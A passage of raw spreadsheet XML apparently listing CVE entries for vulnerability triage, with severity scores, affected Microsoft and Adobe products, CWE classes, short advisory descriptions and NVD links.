unauthorized attacker to execute code locally.</t></is></c><c r="T653" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81959</t></is></c></row><row r="654"><c r="A654" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B654" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C654" s="5" t="inlineStr"><is><t>CVE-2026-81960</t></is></c><c r="D654" s="5" t="n"><v>7.8</v></c><c r="E654" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F654" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G654" s="5" t="inlineStr" /><c r="H654" s="5" t="n"><v>0.004</v></c><c r="I654" s="5" t="inlineStr" /><c r="J654" s="5" t="inlineStr" /><c r="K654" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L654" s="5" t="inlineStr" /><c r="M654" s="5" t="inlineStr" /><c r="N654" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O654" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P654" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q654" s="5" t="inlineStr" /><c r="R654" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S654" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T654" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81960</t></is></c></row><row r="655"><c r="A655" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B655" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C655" s="5" t="inlineStr"><is><t>CVE-2026-81973</t></is></c><c r="D655" s="5" t="n"><v>7.8</v></c><c r="E655" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F655" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G655" s="5" t="inlineStr" /><c r="H655" s="5" t="n"><v>0.002</v></c><c r="I655" s="5" t="inlineStr" /><c r="J655" s="5" t="inlineStr" /><c r="K655" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L655" s="5" t="inlineStr" /><c r="M655" s="5" t="inlineStr" /><c r="N655" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O655" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P655" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q655" s="5" t="inlineStr" /><c r="R655" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S655" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T655" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81973</t></is></c></row><row r="656"><c r="A656" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B656" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C656" s="5" t="inlineStr"><is><t>CVE-2026-81975</t></is></c><c r="D656" s="5" t="n"><v>7.8</v></c><c r="E656" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F656" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G656" s="5" t="inlineStr" /><c r="H656" s="5" t="n"><v>0.002</v></c><c r="I656" s="5" t="inlineStr" /><c r="J656" s="5" t="inlineStr" /><c r="K656" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L656" s="5" t="inlineStr" /><c r="M656" s="5" t="inlineStr" /><c r="N656" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O656" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P656" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q656" s="5" t="inlineStr" /><c r="R656" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S656" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T656" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81975</t></is></c></row><row r="657"><c r="A657" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B657" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C657" s="5" t="inlineStr"><is><t>CVE-2026-81976</t></is></c><c r="D657" s="5" t="n"><v>7.8</v></c><c r="E657" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F657" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G657" s="5" t="inlineStr" /><c r="H657" s="5" t="n"><v>0.002</v></c><c r="I657" s="5" t="inlineStr" /><c r="J657" s="5" t="inlineStr" /><c r="K657" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L657" s="5" t="inlineStr" /><c r="M657" s="5" t="inlineStr" /><c r="N657" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O657" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P657" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q657" s="5" t="inlineStr" /><c r="R657" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S657" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T657" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81976</t></is></c></row><row r="658"><c r="A658" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B658" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C658" s="5" t="inlineStr"><is><t>CVE-2026-81979</t></is></c><c r="D658" s="5" t="n"><v>7.8</v></c><c r="E658" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F658" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G658" s="5" t="inlineStr" /><c r="H658" s="5" t="n"><v>0.002</v></c><c r="I658" s="5" t="inlineStr" /><c r="J658" s="5" t="inlineStr" /><c r="K658" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L658" s="5" t="inlineStr" /><c r="M658" s="5" t="inlineStr" /><c r="N658" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O658" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P658" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q658" s="5" t="inlineStr" /><c r="R658" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S658" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T658" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81979</t></is></c></row><row r="659"><c r="A659" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B659" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C659" s="5" t="inlineStr"><is><t>CVE-2026-81980</t></is></c><c r="D659" s="5" t="n"><v>7.8</v></c><c r="E659" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F659" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G659" s="5" t="inlineStr" /><c r="H659" s="5" t="n"><v>0.002</v></c><c r="I659" s="5" t="inlineStr" /><c r="J659" s="5" t="inlineStr" /><c r="K659" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L659" s="5" t="inlineStr" /><c r="M659" s="5" t="inlineStr" /><c r="N659" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O659" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P659" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q659" s="5" t="inlineStr" /><c r="R659" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S659" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T659" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81980</t></is></c></row><row r="660"><c r="A660" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B660" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C660" s="5" t="inlineStr"><is><t>CVE-2026-81981</t></is></c><c r="D660" s="5" t="n"><v>7.8</v></c><c r="E660" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F660" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G660" s="5" t="inlineStr" /><c r="H660" s="5" t="n"><v>0.002</v></c><c r="I660" s="5" t="inlineStr" /><c r="J660" s="5" t="inlineStr" /><c r="K660" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L660" s="5" t="inlineStr" /><c r="M660" s="5" t="inlineStr" /><c r="N660" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O660" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P660" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q660" s="5" t="inlineStr" /><c r="R660" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S660" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T660" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81981</t></is></c></row><row r="661"><c r="A661" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B661" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C661" s="5" t="inlineStr"><is><t>CVE-2026-81983</t></is></c><c r="D661" s="5" t="n"><v>7.8</v></c><c r="E661" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F661" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G661" s="5" t="inlineStr" /><c r="H661" s="5" t="n"><v>0.002</v></c><c r="I661" s="5" t="inlineStr" /><c r="J661" s="5" t="inlineStr" /><c r="K661" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L661" s="5" t="inlineStr" /><c r="M661" s="5" t="inlineStr" /><c r="N661" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O661" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P661" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q661" s="5" t="inlineStr" /><c r="R661" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S661" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T661" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81983</t></is></c></row><row r="662"><c r="A662" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B662" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C662" s="5" t="inlineStr"><is><t>CVE-2026-81985</t></is></c><c r="D662" s="5" t="n"><v>7.8</v></c><c r="E662" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F662" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G662" s="5" t="inlineStr" /><c r="H662" s="5" t="n"><v>0.002</v></c><c r="I662" s="5" t="inlineStr" /><c r="J662" s="5" t="inlineStr" /><c r="K662" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L662" s="5" t="inlineStr" /><c r="M662" s="5" t="inlineStr" /><c r="N662" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O662" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P662" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q662" s="5" t="inlineStr" /><c r="R662" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S662" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T662" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81985</t></is></c></row><row r="663"><c r="A663" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B663" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C663" s="5" t="inlineStr"><is><t>CVE-2026-81986</t></is></c><c r="D663" s="5" t="n"><v>7.8</v></c><c r="E663" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F663" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G663" s="5" t="inlineStr" /><c r="H663" s="5" t="n"><v>0.002</v></c><c r="I663" s="5" t="inlineStr" /><c r="J663" s="5" t="inlineStr" /><c r="K663" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L663" s="5" t="inlineStr" /><c r="M663" s="5" t="inlineStr" /><c r="N663" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O663" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P663" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q663" s="5" t="inlineStr" /><c r="R663" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S663" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T663" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81986</t></is></c></row><row r="664"><c r="A664" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B664" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C664" s="5" t="inlineStr"><is><t>CVE-2026-81987</t></is></c><c r="D664" s="5" t="n"><v>7.8</v></c><c r="E664" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F664" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G664" s="5" t="inlineStr" /><c r="H664" s="5" t="n"><v>0.002</v></c><c r="I664" s="5" t="inlineStr" /><c r="J664" s="5" t="inlineStr" /><c r="K664" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L664" s="5" t="inlineStr" /><c r="M664" s="5" t="inlineStr" /><c r="N664" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O664" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P664" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q664" s="5" t="inlineStr" /><c r="R664" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S664" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T664" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81987</t></is></c></row><row r="665"><c r="A665" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B665" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C665" s="5" t="inlineStr"><is><t>CVE-2026-81988</t></is></c><c r="D665" s="5" t="n"><v>7.8</v></c><c r="E665" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F665" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G665" s="5" t="inlineStr" /><c r="H665" s="5" t="n"><v>0.002</v></c><c r="I665" s="5" t="inlineStr" /><c r="J665" s="5" t="inlineStr" /><c r="K665" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L665" s="5" t="inlineStr" /><c r="M665" s="5" t="inlineStr" /><c r="N665" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O665" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P665" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q665" s="5" t="inlineStr" /><c r="R665" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S665" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T665" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81988</t></is></c></row><row r="666"><c r="A666" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B666" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C666" s="5" t="inlineStr"><is><t>CVE-2026-81989</t></is></c><c r="D666" s="5" t="n"><v>7.8</v></c><c r="E666" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F666" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G666" s="5" t="inlineStr" /><c r="H666" s="5" t="n"><v>0.002</v></c><c r="I666" s="5" t="inlineStr" /><c r="J666" s="5" t="inlineStr" /><c r="K666" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L666" s="5" t="inlineStr" /><c r="M666" s="5" t="inlineStr" /><c r="N666" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O666" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P666" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q666" s="5" t="inlineStr" /><c r="R666" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S666" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T666" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81989</t></is></c></row><row r="667"><c r="A667" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B667" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C667" s="5" t="inlineStr"><is><t>CVE-2026-81990</t></is></c><c r="D667" s="5" t="n"><v>7.8</v></c><c r="E667" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F667" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G667" s="5" t="inlineStr" /><c r="H667" s="5" t="n"><v>0.002</v></c><c r="I667" s="5" t="inlineStr" /><c r="J667" s="5" t="inlineStr" /><c r="K667" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L667" s="5" t="inlineStr" /><c r="M667" s="5" t="inlineStr" /><c r="N667" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O667" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P667" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q667" s="5" t="inlineStr" /><c r="R667" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S667" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T667" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81990</t></is></c></row><row r="668"><c r="A668" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B668" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C668" s="5" t="inlineStr"><is><t>CVE-2026-81992</t></is></c><c r="D668" s="5" t="n"><v>7.8</v></c><c r="E668" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F668" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G668" s="5" t="inlineStr" /><c r="H668" s="5" t="n"><v>0.002</v></c><c r="I668" s="5" t="inlineStr" /><c r="J668" s="5" t="inlineStr" /><c r="K668" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L668" s="5" t="inlineStr" /><c r="M668" s="5" t="inlineStr" /><c r="N668" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O668" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P668" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q668" s="5" t="inlineStr" /><c r="R668" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S668" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T668" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81992</t></is></c></row><row r="669"><c r="A669" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B669" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C669" s="5" t="inlineStr"><is><t>CVE-2026-82005</t></is></c><c r="D669" s="5" t="n"><v>7.8</v></c><c r="E669" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F669" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G669" s="5" t="inlineStr" /><c r="H669" s="5" t="n"><v>0.002</v></c><c r="I669" s="5" t="inlineStr" /><c r="J669" s="5" t="inlineStr" /><c r="K669" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L669" s="5" t="inlineStr" /><c r="M669" s="5" t="inlineStr" /><c r="N669" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O669" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P669" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q669" s="5" t="inlineStr" /><c r="R669" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S669" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T669" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82005</t></is></c></row><row r="670"><c r="A670" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B670" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C670" s="5" t="inlineStr"><is><t>CVE-2026-82006</t></is></c><c r="D670" s="5" t="n"><v>7.8</v></c><c r="E670" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F670" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G670" s="5" t="inlineStr" /><c r="H670" s="5" t="n"><v>0.002</v></c><c r="I670" s="5" t="inlineStr" /><c r="J670" s="5" t="inlineStr" /><c r="K670" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L670" s="5" t="inlineStr" /><c r="M670" s="5" t="inlineStr" /><c r="N670" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O670" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P670" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q670" s="5" t="inlineStr" /><c r="R670" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S670" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T670" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82006</t></is></c></row><row r="671"><c r="A671" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B671" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C671" s="5" t="inlineStr"><is><t>CVE-2026-82007</t></is></c><c r="D671" s="5" t="n"><v>7.8</v></c><c r="E671" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F671" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G671" s="5" t="inlineStr" /><c r="H671" s="5" t="n"><v>0.002</v></c><c r="I671" s="5" t="inlineStr" /><c r="J671" s="5" t="inlineStr" /><c r="K671" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L671" s="5" t="inlineStr" /><c r="M671" s="5" t="inlineStr" /><c r="N671" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O671" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P671" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q671" s="5" t="inlineStr" /><c r="R671" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S67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71" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82007</t></is></c></row><row r="672"><c r="A672" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B672" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C672" s="5" t="inlineStr"><is><t>CVE-2026-83498</t></is></c><c r="D672" s="5" t="n"><v>7.8</v></c><c r="E672" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F672" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G672" s="5" t="inlineStr" /><c r="H672" s="5" t="n"><v>0.003</v></c><c r="I672" s="5" t="inlineStr" /><c r="J672" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K672" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L672" s="5" t="inlineStr" /><c r="M672" s="5" t="inlineStr" /><c r="N672" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O672" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P672" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q672" s="5" t="inlineStr" /><c r="R672" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S672" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T672" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83498</t></is></c></row><row r="673"><c r="A673" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B673" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C673" s="5" t="inlineStr"><is><t>CVE-2026-83942</t></is></c><c r="D673" s="5" t="n"><v>7.8</v></c><c r="E673" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F673" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G673" s="5" t="inlineStr" /><c r="H673" s="5" t="n"><v>0.002</v></c><c r="I673" s="5" t="inlineStr" /><c r="J673" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K673"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673" s="5" t="inlineStr" /><c r="M673" s="5" t="inlineStr" /><c r="N673" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O673" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P673" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q673" s="5" t="inlineStr" /><c r="R673" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S673" s="5" t="inlineStr"><is><t>Missing authorization in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T673" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83942</t></is></c></row><row r="674"><c r="A674" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B674" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C674" s="5" t="inlineStr"><is><t>CVE-2026-83952</t></is></c><c r="D674" s="5" t="n"><v>7.8</v></c><c r="E674" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F674" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G674" s="5" t="inlineStr" /><c r="H674" s="5" t="n"><v>0.002</v></c><c r="I674" s="5" t="inlineStr" /><c r="J674" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K674" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c 